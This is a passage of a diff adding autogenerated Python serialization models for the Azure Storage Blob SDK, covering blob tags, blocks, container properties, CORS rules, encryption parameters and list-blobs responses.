:paramtype legal_hold: bool + """ + super(BlobPropertiesInternal, self).__init__(**kwargs) + self.creation_time = kwargs.get('creation_time', None) + self.last_modified = kwargs['last_modified'] + self.etag = kwargs['etag'] + self.content_length = kwargs.get('content_length', None) + self.content_type = kwargs.get('content_type', None) + self.content_encoding = kwargs.get('content_encoding', None) + self.content_language = kwargs.get('content_language', None) + self.content_md5 = kwargs.get('content_md5', None) + self.content_disposition = kwargs.get('content_disposition', None) + self.cache_control = kwargs.get('cache_control', None) + self.blob_sequence_number = kwargs.get('blob_sequence_number', None) + self.blob_type = kwargs.get('blob_type', None) + self.lease_status = kwargs.get('lease_status', None) + self.lease_state = kwargs.get('lease_state', None) + self.lease_duration = kwargs.get('lease_duration', None) + self.copy_id = kwargs.get('copy_id', None) + self.copy_status = kwargs.get('copy_status', None) + self.copy_source = kwargs.get('copy_source', None) + self.copy_progress = kwargs.get('copy_progress', None) + self.copy_completion_time = kwargs.get('copy_completion_time', None) + self.copy_status_description = kwargs.get('copy_status_description', None) + self.server_encrypted = kwargs.get('server_encrypted', None) + self.incremental_copy = kwargs.get('incremental_copy', None) + self.destination_snapshot = kwargs.get('destination_snapshot', None) + self.deleted_time = kwargs.get('deleted_time', None) + self.remaining_retention_days = kwargs.get('remaining_retention_days', None) + self.access_tier = kwargs.get('access_tier', None) + self.access_tier_inferred = kwargs.get('access_tier_inferred', None) + self.archive_status = kwargs.get('archive_status', None) + self.customer_provided_key_sha256 = kwargs.get('customer_provided_key_sha256', None) + self.encryption_scope = kwargs.get('encryption_scope', None) + self.access_tier_change_time = kwargs.get('access_tier_change_time', None) + self.tag_count = kwargs.get('tag_count', None) + self.expires_on = kwargs.get('expires_on', None) + self.is_sealed = kwargs.get('is_sealed', None) + self.rehydrate_priority = kwargs.get('rehydrate_priority', None) + self.last_accessed_on = 
kwargs.get('last_accessed_on', None) + self.immutability_policy_expires_on = kwargs.get('immutability_policy_expires_on', None) + self.immutability_policy_mode = kwargs.get('immutability_policy_mode', None) + self.legal_hold = kwargs.get('legal_hold', None) + + +class BlobTag(msrest.serialization.Model): + """BlobTag. + + All required parameters must be populated in order to send to Azure. + + :ivar key: Required. + :vartype key: str + :ivar value: Required. + :vartype value: str + """ + + _validation = { + 'key': {'required': True}, + 'value': {'required': True}, + } + + _attribute_map = { + 'key': {'key': 'Key', 'type': 'str'}, + 'value': {'key': 'Value', 'type': 'str'}, + } + _xml_map = { + 'name': 'Tag' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword key: Required. + :paramtype key: str + :keyword value: Required. + :paramtype value: str + """ + super(BlobTag, self).__init__(**kwargs) + self.key = kwargs['key'] + self.value = kwargs['value'] + + +class BlobTags(msrest.serialization.Model): + """Blob tags. + + All required parameters must be populated in order to send to Azure. + + :ivar blob_tag_set: Required. + :vartype blob_tag_set: list[~azure.storage.blob.models.BlobTag] + """ + + _validation = { + 'blob_tag_set': {'required': True}, + } + + _attribute_map = { + 'blob_tag_set': {'key': 'BlobTagSet', 'type': '[BlobTag]', 'xml': {'name': 'TagSet', 'wrapped': True, 'itemsName': 'Tag'}}, + } + _xml_map = { + 'name': 'Tags' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword blob_tag_set: Required. + :paramtype blob_tag_set: list[~azure.storage.blob.models.BlobTag] + """ + super(BlobTags, self).__init__(**kwargs) + self.blob_tag_set = kwargs['blob_tag_set'] + + +class Block(msrest.serialization.Model): + """Represents a single block in a block blob. It describes the block's ID and size. + + All required parameters must be populated in order to send to Azure. + + :ivar name: Required. The base64 encoded block ID. + :vartype name: str + :ivar size: Required. The block size in bytes. + :vartype size: long + """ + + _validation = { + 'name': {'required': True}, + 'size': {'required': True}, + } + + _attribute_map = { + 'name': {'key': 'Name', 'type': 'str'}, + 'size': {'key': 'Size', 'type': 'long'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword name: Required. The base64 encoded block ID. + :paramtype name: str + :keyword size: Required. The block size in bytes. + :paramtype size: long + """ + super(Block, self).__init__(**kwargs) + self.name = kwargs['name'] + self.size = kwargs['size'] + + +class BlockList(msrest.serialization.Model): + """BlockList. 
+ + :ivar committed_blocks: + :vartype committed_blocks: list[~azure.storage.blob.models.Block] + :ivar uncommitted_blocks: + :vartype uncommitted_blocks: list[~azure.storage.blob.models.Block] + """ + + _attribute_map = { + 'committed_blocks': {'key': 'CommittedBlocks', 'type': '[Block]', 'xml': {'wrapped': True}}, + 'uncommitted_blocks': {'key': 'UncommittedBlocks', 'type': '[Block]', 'xml': {'wrapped': True}}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword committed_blocks: + :paramtype committed_blocks: list[~azure.storage.blob.models.Block] + :keyword uncommitted_blocks: + :paramtype uncommitted_blocks: list[~azure.storage.blob.models.Block] + """ + super(BlockList, self).__init__(**kwargs) + self.committed_blocks = kwargs.get('committed_blocks', None) + self.uncommitted_blocks = kwargs.get('uncommitted_blocks', None) + + +class BlockLookupList(msrest.serialization.Model): + """BlockLookupList. + + :ivar committed: + :vartype committed: list[str] + :ivar uncommitted: + :vartype uncommitted: list[str] + :ivar latest: + :vartype latest: list[str] + """ + + _attribute_map = { + 'committed': {'key': 'Committed', 'type': '[str]', 'xml': {'itemsName': 'Committed'}}, + 'uncommitted': {'key': 'Uncommitted', 'type': '[str]', 'xml': {'itemsName': 'Uncommitted'}}, + 'latest': {'key': 'Latest', 'type': '[str]', 'xml': {'itemsName': 'Latest'}}, + } + _xml_map = { + 'name': 'BlockList' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword committed: + :paramtype committed: list[str] + :keyword uncommitted: + :paramtype uncommitted: list[str] + :keyword latest: + :paramtype latest: list[str] + """ + super(BlockLookupList, self).__init__(**kwargs) + self.committed = kwargs.get('committed', None) + self.uncommitted = kwargs.get('uncommitted', None) + self.latest = kwargs.get('latest', None) + + +class ClearRange(msrest.serialization.Model): + """ClearRange. + + All required parameters must be populated in order to send to Azure. + + :ivar start: Required. + :vartype start: long + :ivar end: Required. + :vartype end: long + """ + + _validation = { + 'start': {'required': True}, + 'end': {'required': True}, + } + + _attribute_map = { + 'start': {'key': 'Start', 'type': 'long', 'xml': {'name': 'Start'}}, + 'end': {'key': 'End', 'type': 'long', 'xml': {'name': 'End'}}, + } + _xml_map = { + 'name': 'ClearRange' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword start: Required. + :paramtype start: long + :keyword end: Required. + :paramtype end: long + """ + super(ClearRange, self).__init__(**kwargs) + self.start = kwargs['start'] + self.end = kwargs['end'] + + +class ContainerCpkScopeInfo(msrest.serialization.Model): + """Parameter group. + + :ivar default_encryption_scope: Optional. Version 2019-07-07 and later. Specifies the default + encryption scope to set on the container and use for all future writes. + :vartype default_encryption_scope: str + :ivar prevent_encryption_scope_override: Optional. Version 2019-07-07 and newer. If true, + prevents any request from specifying a different encryption scope than the scope set on the + container. + :vartype prevent_encryption_scope_override: bool + """ + + _attribute_map = { + 'default_encryption_scope': {'key': 'DefaultEncryptionScope', 'type': 'str'}, + 'prevent_encryption_scope_override': {'key': 'PreventEncryptionScopeOverride', 'type': 'bool'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword default_encryption_scope: Optional. Version 2019-07-07 and later. 
Specifies the
+         default encryption scope to set on the container and use for all future writes.
+        :paramtype default_encryption_scope: str
+        :keyword prevent_encryption_scope_override: Optional. Version 2019-07-07 and newer. If true,
+         prevents any request from specifying a different encryption scope than the scope set on the
+         container.
+        :paramtype prevent_encryption_scope_override: bool
+        """
+        super(ContainerCpkScopeInfo, self).__init__(**kwargs)
+        self.default_encryption_scope = kwargs.get('default_encryption_scope', None)
+        self.prevent_encryption_scope_override = kwargs.get('prevent_encryption_scope_override', None)
+
+
+class ContainerItem(msrest.serialization.Model):
+    """An Azure Storage container.
+
+    All required parameters must be populated in order to send to Azure.
+
+    :ivar name: Required.
+    :vartype name: str
+    :ivar deleted:
+    :vartype deleted: bool
+    :ivar version:
+    :vartype version: str
+    :ivar properties: Required. Properties of a container.
+    :vartype properties: ~azure.storage.blob.models.ContainerProperties
+    :ivar metadata: Dictionary of :code:`<string>`.
+    :vartype metadata: dict[str, str]
+    """
+
+    _validation = {
+        'name': {'required': True},
+        'properties': {'required': True},
+    }
+
+    _attribute_map = {
+        'name': {'key': 'Name', 'type': 'str'},
+        'deleted': {'key': 'Deleted', 'type': 'bool'},
+        'version': {'key': 'Version', 'type': 'str'},
+        'properties': {'key': 'Properties', 'type': 'ContainerProperties'},
+        'metadata': {'key': 'Metadata', 'type': '{str}'},
+    }
+    _xml_map = {
+        'name': 'Container'
+    }
+
+    def __init__(
+        self,
+        **kwargs
+    ):
+        """
+        :keyword name: Required.
+        :paramtype name: str
+        :keyword deleted:
+        :paramtype deleted: bool
+        :keyword version:
+        :paramtype version: str
+        :keyword properties: Required. Properties of a container.
+        :paramtype properties: ~azure.storage.blob.models.ContainerProperties
+        :keyword metadata: Dictionary of :code:`<string>`.
+        :paramtype metadata: dict[str, str]
+        """
+        super(ContainerItem, self).__init__(**kwargs)
+        self.name = kwargs['name']
+        self.deleted = kwargs.get('deleted', None)
+        self.version = kwargs.get('version', None)
+        self.properties = kwargs['properties']
+        self.metadata = kwargs.get('metadata', None)
+
+
+class ContainerProperties(msrest.serialization.Model):
+    """Properties of a container.
+
+    All required parameters must be populated in order to send to Azure.
+
+    :ivar last_modified: Required.
+    :vartype last_modified: ~datetime.datetime
+    :ivar etag: Required.
+    :vartype etag: str
+    :ivar lease_status: Possible values include: "locked", "unlocked".
+    :vartype lease_status: str or ~azure.storage.blob.models.LeaseStatusType
+    :ivar lease_state: Possible values include: "available", "leased", "expired", "breaking",
+     "broken".
+    :vartype lease_state: str or ~azure.storage.blob.models.LeaseStateType
+    :ivar lease_duration: Possible values include: "infinite", "fixed".
+    :vartype lease_duration: str or ~azure.storage.blob.models.LeaseDurationType
+    :ivar public_access: Possible values include: "container", "blob".
+    :vartype public_access: str or ~azure.storage.blob.models.PublicAccessType
+    :ivar has_immutability_policy:
+    :vartype has_immutability_policy: bool
+    :ivar has_legal_hold:
+    :vartype has_legal_hold: bool
+    :ivar default_encryption_scope:
+    :vartype default_encryption_scope: str
+    :ivar prevent_encryption_scope_override:
+    :vartype prevent_encryption_scope_override: bool
+    :ivar deleted_time:
+    :vartype deleted_time: ~datetime.datetime
+    :ivar remaining_retention_days:
+    :vartype remaining_retention_days: int
+    :ivar is_immutable_storage_with_versioning_enabled: Indicates whether version-level WORM
+     (write once, read many) is enabled on this container.
+    :vartype is_immutable_storage_with_versioning_enabled: bool
+    """
+
+    _validation = {
+        'last_modified': {'required': True},
+        'etag': {'required': True},
+    }
+
+    _attribute_map = {
+        'last_modified': {'key': 'Last-Modified', 'type': 'rfc-1123'},
+        'etag': {'key': 'Etag', 'type': 'str'},
+        'lease_status': {'key': 'LeaseStatus', 'type': 'str'},
+        'lease_state': {'key': 'LeaseState', 'type': 'str'},
+        'lease_duration': {'key': 'LeaseDuration', 'type': 'str'},
+        'public_access': {'key': 'PublicAccess', 'type': 'str'},
+        'has_immutability_policy': {'key': 'HasImmutabilityPolicy', 'type': 'bool'},
+        'has_legal_hold': {'key': 'HasLegalHold', 'type': 'bool'},
+        'default_encryption_scope': {'key': 'DefaultEncryptionScope', 'type': 'str'},
+        'prevent_encryption_scope_override': {'key': 'DenyEncryptionScopeOverride', 'type': 'bool'},
+        'deleted_time': {'key': 'DeletedTime', 'type': 'rfc-1123'},
+        'remaining_retention_days': {'key': 'RemainingRetentionDays', 'type': 'int'},
+        'is_immutable_storage_with_versioning_enabled': {'key': 'ImmutableStorageWithVersioningEnabled', 'type': 'bool'},
+    }
+
+    def __init__(
+        self,
+        **kwargs
+    ):
+        """
+        :keyword last_modified: Required.
+        :paramtype last_modified: ~datetime.datetime
+        :keyword etag: Required.
+        :paramtype etag: str
+        :keyword lease_status: Possible values include: "locked", "unlocked".
+        :paramtype lease_status: str or ~azure.storage.blob.models.LeaseStatusType
+        :keyword lease_state: Possible values include: "available", "leased", "expired", "breaking",
+         "broken".
+        :paramtype lease_state: str or ~azure.storage.blob.models.LeaseStateType
+        :keyword lease_duration: Possible values include: "infinite", "fixed".
+        :paramtype lease_duration: str or ~azure.storage.blob.models.LeaseDurationType
+        :keyword public_access: Possible values include: "container", "blob".
+        :paramtype public_access: str or ~azure.storage.blob.models.PublicAccessType
+        :keyword has_immutability_policy:
+        :paramtype has_immutability_policy: bool
+        :keyword has_legal_hold:
+        :paramtype has_legal_hold: bool
+        :keyword default_encryption_scope:
+        :paramtype default_encryption_scope: str
+        :keyword prevent_encryption_scope_override:
+        :paramtype prevent_encryption_scope_override: bool
+        :keyword deleted_time:
+        :paramtype deleted_time: ~datetime.datetime
+        :keyword remaining_retention_days:
+        :paramtype remaining_retention_days: int
+        :keyword is_immutable_storage_with_versioning_enabled: Indicates whether version-level WORM
+         (write once, read many) is enabled on this container.
+        :paramtype is_immutable_storage_with_versioning_enabled: bool
+        """
+        super(ContainerProperties, self).__init__(**kwargs)
+        self.last_modified = kwargs['last_modified']
+        self.etag = kwargs['etag']
+        self.lease_status = kwargs.get('lease_status', None)
+        self.lease_state = kwargs.get('lease_state', None)
+        self.lease_duration = kwargs.get('lease_duration', None)
+        self.public_access = kwargs.get('public_access', None)
+        self.has_immutability_policy = kwargs.get('has_immutability_policy', None)
+        self.has_legal_hold = kwargs.get('has_legal_hold', None)
+        self.default_encryption_scope = kwargs.get('default_encryption_scope', None)
+        self.prevent_encryption_scope_override = kwargs.get('prevent_encryption_scope_override', None)
+        self.deleted_time = kwargs.get('deleted_time', None)
+        self.remaining_retention_days = kwargs.get('remaining_retention_days', None)
+        self.is_immutable_storage_with_versioning_enabled = kwargs.get('is_immutable_storage_with_versioning_enabled', None)
+
+
+class CorsRule(msrest.serialization.Model):
+    """CORS is an HTTP feature that enables a web application running under one domain to access resources in another domain. Web browsers implement a security restriction known as same-origin policy that prevents a web page from calling APIs in a different domain; CORS provides a secure way to allow one domain (the origin domain) to call APIs in another domain.
+
+    All required parameters must be populated in order to send to Azure.
+
+    :ivar allowed_origins: Required. The origin domains that are permitted to make a request
+     against the storage service via CORS. The origin domain is the domain from which the request
+     originates. Note that the origin must be an exact case-sensitive match with the origin that the
+     user agent sends to the service. You can also use the wildcard character '*' to allow all origin
+     domains to make requests via CORS.
+    :vartype allowed_origins: str
+    :ivar allowed_methods: Required. The methods (HTTP request verbs) that the origin domain may
+     use for a CORS request, as a comma-separated list.
+    :vartype allowed_methods: str
+    :ivar allowed_headers: Required. The request headers that the origin domain may specify on the
+     CORS request.
+    :vartype allowed_headers: str
+    :ivar exposed_headers: Required. The response headers that may be sent in the response to the
+     CORS request and exposed by the browser to the request issuer.
+    :vartype exposed_headers: str
+    :ivar max_age_in_seconds: Required. The maximum amount of time that a browser should cache the
+     preflight OPTIONS request.
+    :vartype max_age_in_seconds: int
+    """
+
+    _validation = {
+        'allowed_origins': {'required': True},
+        'allowed_methods': {'required': True},
+        'allowed_headers': {'required': True},
+        'exposed_headers': {'required': True},
+        'max_age_in_seconds': {'required': True, 'minimum': 0},
+    }
+
+    _attribute_map = {
+        'allowed_origins': {'key': 'AllowedOrigins', 'type': 'str'},
+        'allowed_methods': {'key': 'AllowedMethods', 'type': 'str'},
+        'allowed_headers': {'key': 'AllowedHeaders', 'type': 'str'},
+        'exposed_headers': {'key': 'ExposedHeaders', 'type': 'str'},
+        'max_age_in_seconds': {'key': 'MaxAgeInSeconds', 'type': 'int'},
+    }
+
+    def __init__(
+        self,
+        **kwargs
+    ):
+        """
+        :keyword allowed_origins: Required. The origin domains that are permitted to make a request
+         against the storage service via CORS. The origin domain is the domain from which the request
+         originates.
Note that the origin must be an exact case-sensitive match with the origin that the
+         user agent sends to the service. You can also use the wildcard character '*' to allow all origin
+         domains to make requests via CORS.
+        :paramtype allowed_origins: str
+        :keyword allowed_methods: Required. The methods (HTTP request verbs) that the origin domain may
+         use for a CORS request, as a comma-separated list.
+        :paramtype allowed_methods: str
+        :keyword allowed_headers: Required. The request headers that the origin domain may specify on
+         the CORS request.
+        :paramtype allowed_headers: str
+        :keyword exposed_headers: Required. The response headers that may be sent in the response to
+         the CORS request and exposed by the browser to the request issuer.
+        :paramtype exposed_headers: str
+        :keyword max_age_in_seconds: Required. The maximum amount of time that a browser should cache
+         the preflight OPTIONS request.
+        :paramtype max_age_in_seconds: int
+        """
+        super(CorsRule, self).__init__(**kwargs)
+        self.allowed_origins = kwargs['allowed_origins']
+        self.allowed_methods = kwargs['allowed_methods']
+        self.allowed_headers = kwargs['allowed_headers']
+        self.exposed_headers = kwargs['exposed_headers']
+        self.max_age_in_seconds = kwargs['max_age_in_seconds']
+
+
+class CpkInfo(msrest.serialization.Model):
+    """Parameter group.
+
+    :ivar encryption_key: Optional. Specifies the encryption key to use to encrypt the data
+     provided in the request. If not specified, encryption is performed with the root account
+     encryption key. For more information, see Encryption at Rest for Azure Storage Services.
+    :vartype encryption_key: str
+    :ivar encryption_key_sha256: The SHA-256 hash of the provided encryption key. Must be provided
+     if the x-ms-encryption-key header is provided.
+    :vartype encryption_key_sha256: str
+    :ivar encryption_algorithm: The algorithm used to produce the encryption key hash. Currently,
+     the only accepted value is "AES256". Must be provided if the x-ms-encryption-key header is
+     provided. Possible values include: "None", "AES256".
+    :vartype encryption_algorithm: str or ~azure.storage.blob.models.EncryptionAlgorithmType
+    """
+
+    _attribute_map = {
+        'encryption_key': {'key': 'encryptionKey', 'type': 'str'},
+        'encryption_key_sha256': {'key': 'encryptionKeySha256', 'type': 'str'},
+        'encryption_algorithm': {'key': 'encryptionAlgorithm', 'type': 'str'},
+    }
+
+    def __init__(
+        self,
+        **kwargs
+    ):
+        """
+        :keyword encryption_key: Optional. Specifies the encryption key to use to encrypt the data
+         provided in the request. If not specified, encryption is performed with the root account
+         encryption key. For more information, see Encryption at Rest for Azure Storage Services.
+        :paramtype encryption_key: str
+        :keyword encryption_key_sha256: The SHA-256 hash of the provided encryption key. Must be
+         provided if the x-ms-encryption-key header is provided.
+        :paramtype encryption_key_sha256: str
+        :keyword encryption_algorithm: The algorithm used to produce the encryption key hash.
+         Currently, the only accepted value is "AES256". Must be provided if the x-ms-encryption-key
+         header is provided. Possible values include: "None", "AES256".
+ :paramtype encryption_algorithm: str or ~azure.storage.blob.models.EncryptionAlgorithmType + """ + super(CpkInfo, self).__init__(**kwargs) + self.encryption_key = kwargs.get('encryption_key', None) + self.encryption_key_sha256 = kwargs.get('encryption_key_sha256', None) + self.encryption_algorithm = kwargs.get('encryption_algorithm', None) + + +class CpkScopeInfo(msrest.serialization.Model): + """Parameter group. + + :ivar encryption_scope: Optional. Version 2019-07-07 and later. Specifies the name of the + encryption scope to use to encrypt the data provided in the request. If not specified, + encryption is performed with the default account encryption scope. For more information, see + Encryption at Rest for Azure Storage Services. + :vartype encryption_scope: str + """ + + _attribute_map = { + 'encryption_scope': {'key': 'encryptionScope', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword encryption_scope: Optional. Version 2019-07-07 and later. Specifies the name of the + encryption scope to use to encrypt the data provided in the request. If not specified, + encryption is performed with the default account encryption scope. For more information, see + Encryption at Rest for Azure Storage Services. + :paramtype encryption_scope: str + """ + super(CpkScopeInfo, self).__init__(**kwargs) + self.encryption_scope = kwargs.get('encryption_scope', None) + + +class DelimitedTextConfiguration(msrest.serialization.Model): + """Groups the settings used for interpreting the blob data if the blob is delimited text formatted. + + :ivar column_separator: The string used to separate columns. + :vartype column_separator: str + :ivar field_quote: The string used to quote a specific field. + :vartype field_quote: str + :ivar record_separator: The string used to separate records. + :vartype record_separator: str + :ivar escape_char: The string used as an escape character. + :vartype escape_char: str + :ivar headers_present: Represents whether the data has headers. + :vartype headers_present: bool + """ + + _attribute_map = { + 'column_separator': {'key': 'ColumnSeparator', 'type': 'str', 'xml': {'name': 'ColumnSeparator'}}, + 'field_quote': {'key': 'FieldQuote', 'type': 'str', 'xml': {'name': 'FieldQuote'}}, + 'record_separator': {'key': 'RecordSeparator', 'type': 'str', 'xml': {'name': 'RecordSeparator'}}, + 'escape_char': {'key': 'EscapeChar', 'type': 'str', 'xml': {'name': 'EscapeChar'}}, + 'headers_present': {'key': 'HeadersPresent', 'type': 'bool', 'xml': {'name': 'HasHeaders'}}, + } + _xml_map = { + 'name': 'DelimitedTextConfiguration' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword column_separator: The string used to separate columns. + :paramtype column_separator: str + :keyword field_quote: The string used to quote a specific field. + :paramtype field_quote: str + :keyword record_separator: The string used to separate records. + :paramtype record_separator: str + :keyword escape_char: The string used as an escape character. + :paramtype escape_char: str + :keyword headers_present: Represents whether the data has headers. 
+ :paramtype headers_present: bool + """ + super(DelimitedTextConfiguration, self).__init__(**kwargs) + self.column_separator = kwargs.get('column_separator', None) + self.field_quote = kwargs.get('field_quote', None) + self.record_separator = kwargs.get('record_separator', None) + self.escape_char = kwargs.get('escape_char', None) + self.headers_present = kwargs.get('headers_present', None) + + +class FilterBlobItem(msrest.serialization.Model): + """Blob info from a Filter Blobs API call. + + All required parameters must be populated in order to send to Azure. + + :ivar name: Required. + :vartype name: str + :ivar container_name: Required. + :vartype container_name: str + :ivar tags: A set of tags. Blob tags. + :vartype tags: ~azure.storage.blob.models.BlobTags + """ + + _validation = { + 'name': {'required': True}, + 'container_name': {'required': True}, + } + + _attribute_map = { + 'name': {'key': 'Name', 'type': 'str'}, + 'container_name': {'key': 'ContainerName', 'type': 'str'}, + 'tags': {'key': 'Tags', 'type': 'BlobTags'}, + } + _xml_map = { + 'name': 'Blob' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword name: Required. + :paramtype name: str + :keyword container_name: Required. + :paramtype container_name: str + :keyword tags: A set of tags. Blob tags. + :paramtype tags: ~azure.storage.blob.models.BlobTags + """ + super(FilterBlobItem, self).__init__(**kwargs) + self.name = kwargs['name'] + self.container_name = kwargs['container_name'] + self.tags = kwargs.get('tags', None) + + +class FilterBlobSegment(msrest.serialization.Model): + """The result of a Filter Blobs API call. + + All required parameters must be populated in order to send to Azure. + + :ivar service_endpoint: Required. + :vartype service_endpoint: str + :ivar where: Required. + :vartype where: str + :ivar blobs: Required. + :vartype blobs: list[~azure.storage.blob.models.FilterBlobItem] + :ivar next_marker: + :vartype next_marker: str + """ + + _validation = { + 'service_endpoint': {'required': True}, + 'where': {'required': True}, + 'blobs': {'required': True}, + } + + _attribute_map = { + 'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}}, + 'where': {'key': 'Where', 'type': 'str'}, + 'blobs': {'key': 'Blobs', 'type': '[FilterBlobItem]', 'xml': {'name': 'Blobs', 'wrapped': True, 'itemsName': 'Blob'}}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + _xml_map = { + 'name': 'EnumerationResults' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword service_endpoint: Required. + :paramtype service_endpoint: str + :keyword where: Required. + :paramtype where: str + :keyword blobs: Required. + :paramtype blobs: list[~azure.storage.blob.models.FilterBlobItem] + :keyword next_marker: + :paramtype next_marker: str + """ + super(FilterBlobSegment, self).__init__(**kwargs) + self.service_endpoint = kwargs['service_endpoint'] + self.where = kwargs['where'] + self.blobs = kwargs['blobs'] + self.next_marker = kwargs.get('next_marker', None) + + +class GeoReplication(msrest.serialization.Model): + """Geo-Replication information for the Secondary Storage Service. + + All required parameters must be populated in order to send to Azure. + + :ivar status: Required. The status of the secondary location. Possible values include: "live", + "bootstrap", "unavailable". + :vartype status: str or ~azure.storage.blob.models.GeoReplicationStatusType + :ivar last_sync_time: Required. A GMT date/time value, to the second. 
All primary writes + preceding this value are guaranteed to be available for read operations at the secondary. + Primary writes after this point in time may or may not be available for reads. + :vartype last_sync_time: ~datetime.datetime + """ + + _validation = { + 'status': {'required': True}, + 'last_sync_time': {'required': True}, + } + + _attribute_map = { + 'status': {'key': 'Status', 'type': 'str'}, + 'last_sync_time': {'key': 'LastSyncTime', 'type': 'rfc-1123'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword status: Required. The status of the secondary location. Possible values include: + "live", "bootstrap", "unavailable". + :paramtype status: str or ~azure.storage.blob.models.GeoReplicationStatusType + :keyword last_sync_time: Required. A GMT date/time value, to the second. All primary writes + preceding this value are guaranteed to be available for read operations at the secondary. + Primary writes after this point in time may or may not be available for reads. + :paramtype last_sync_time: ~datetime.datetime + """ + super(GeoReplication, self).__init__(**kwargs) + self.status = kwargs['status'] + self.last_sync_time = kwargs['last_sync_time'] + + +class JsonTextConfiguration(msrest.serialization.Model): + """json text configuration. + + :ivar record_separator: The string used to separate records. + :vartype record_separator: str + """ + + _attribute_map = { + 'record_separator': {'key': 'RecordSeparator', 'type': 'str', 'xml': {'name': 'RecordSeparator'}}, + } + _xml_map = { + 'name': 'JsonTextConfiguration' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword record_separator: The string used to separate records. + :paramtype record_separator: str + """ + super(JsonTextConfiguration, self).__init__(**kwargs) + self.record_separator = kwargs.get('record_separator', None) + + +class KeyInfo(msrest.serialization.Model): + """Key information. + + All required parameters must be populated in order to send to Azure. + + :ivar start: Required. The date-time the key is active in ISO 8601 UTC time. + :vartype start: str + :ivar expiry: Required. The date-time the key expires in ISO 8601 UTC time. + :vartype expiry: str + """ + + _validation = { + 'start': {'required': True}, + 'expiry': {'required': True}, + } + + _attribute_map = { + 'start': {'key': 'Start', 'type': 'str'}, + 'expiry': {'key': 'Expiry', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword start: Required. The date-time the key is active in ISO 8601 UTC time. + :paramtype start: str + :keyword expiry: Required. The date-time the key expires in ISO 8601 UTC time. + :paramtype expiry: str + """ + super(KeyInfo, self).__init__(**kwargs) + self.start = kwargs['start'] + self.expiry = kwargs['expiry'] + + +class LeaseAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar lease_id: If specified, the operation only succeeds if the resource's lease is active and + matches this ID. + :vartype lease_id: str + """ + + _attribute_map = { + 'lease_id': {'key': 'leaseId', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword lease_id: If specified, the operation only succeeds if the resource's lease is active + and matches this ID. + :paramtype lease_id: str + """ + super(LeaseAccessConditions, self).__init__(**kwargs) + self.lease_id = kwargs.get('lease_id', None) + + +class ListBlobsFlatSegmentResponse(msrest.serialization.Model): + """An enumeration of blobs. + + All required parameters must be populated in order to send to Azure. 
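+
+    Example (an illustrative sketch, not part of the generated code; ``response``
+    is assumed to be an already deserialized instance of this model). It shows
+    how a page of results and the continuation marker are typically consumed::
+
+        names = [blob.name for blob in response.segment.blob_items]
+        if response.next_marker:
+            # Re-issue the List Blobs call with marker=response.next_marker
+            # to fetch the next page.
+            pass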
+ + :ivar service_endpoint: Required. + :vartype service_endpoint: str + :ivar container_name: Required. + :vartype container_name: str + :ivar prefix: + :vartype prefix: str + :ivar marker: + :vartype marker: str + :ivar max_results: + :vartype max_results: int + :ivar segment: Required. + :vartype segment: ~azure.storage.blob.models.BlobFlatListSegment + :ivar next_marker: + :vartype next_marker: str + """ + + _validation = { + 'service_endpoint': {'required': True}, + 'container_name': {'required': True}, + 'segment': {'required': True}, + } + + _attribute_map = { + 'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}}, + 'container_name': {'key': 'ContainerName', 'type': 'str', 'xml': {'attr': True}}, + 'prefix': {'key': 'Prefix', 'type': 'str'}, + 'marker': {'key': 'Marker', 'type': 'str'}, + 'max_results': {'key': 'MaxResults', 'type': 'int'}, + 'segment': {'key': 'Segment', 'type': 'BlobFlatListSegment'}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + _xml_map = { + 'name': 'EnumerationResults' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword service_endpoint: Required. + :paramtype service_endpoint: str + :keyword container_name: Required. + :paramtype container_name: str + :keyword prefix: + :paramtype prefix: str + :keyword marker: + :paramtype marker: str + :keyword max_results: + :paramtype max_results: int + :keyword segment: Required. + :paramtype segment: ~azure.storage.blob.models.BlobFlatListSegment + :keyword next_marker: + :paramtype next_marker: str + """ + super(ListBlobsFlatSegmentResponse, self).__init__(**kwargs) + self.service_endpoint = kwargs['service_endpoint'] + self.container_name = kwargs['container_name'] + self.prefix = kwargs.get('prefix', None) + self.marker = kwargs.get('marker', None) + self.max_results = kwargs.get('max_results', None) + self.segment = kwargs['segment'] + self.next_marker = kwargs.get('next_marker', None) + + +class ListBlobsHierarchySegmentResponse(msrest.serialization.Model): + """An enumeration of blobs. + + All required parameters must be populated in order to send to Azure. + + :ivar service_endpoint: Required. + :vartype service_endpoint: str + :ivar container_name: Required. + :vartype container_name: str + :ivar prefix: + :vartype prefix: str + :ivar marker: + :vartype marker: str + :ivar max_results: + :vartype max_results: int + :ivar delimiter: + :vartype delimiter: str + :ivar segment: Required. + :vartype segment: ~azure.storage.blob.models.BlobHierarchyListSegment + :ivar next_marker: + :vartype next_marker: str + """ + + _validation = { + 'service_endpoint': {'required': True}, + 'container_name': {'required': True}, + 'segment': {'required': True}, + } + + _attribute_map = { + 'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}}, + 'container_name': {'key': 'ContainerName', 'type': 'str', 'xml': {'attr': True}}, + 'prefix': {'key': 'Prefix', 'type': 'str'}, + 'marker': {'key': 'Marker', 'type': 'str'}, + 'max_results': {'key': 'MaxResults', 'type': 'int'}, + 'delimiter': {'key': 'Delimiter', 'type': 'str'}, + 'segment': {'key': 'Segment', 'type': 'BlobHierarchyListSegment'}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + _xml_map = { + 'name': 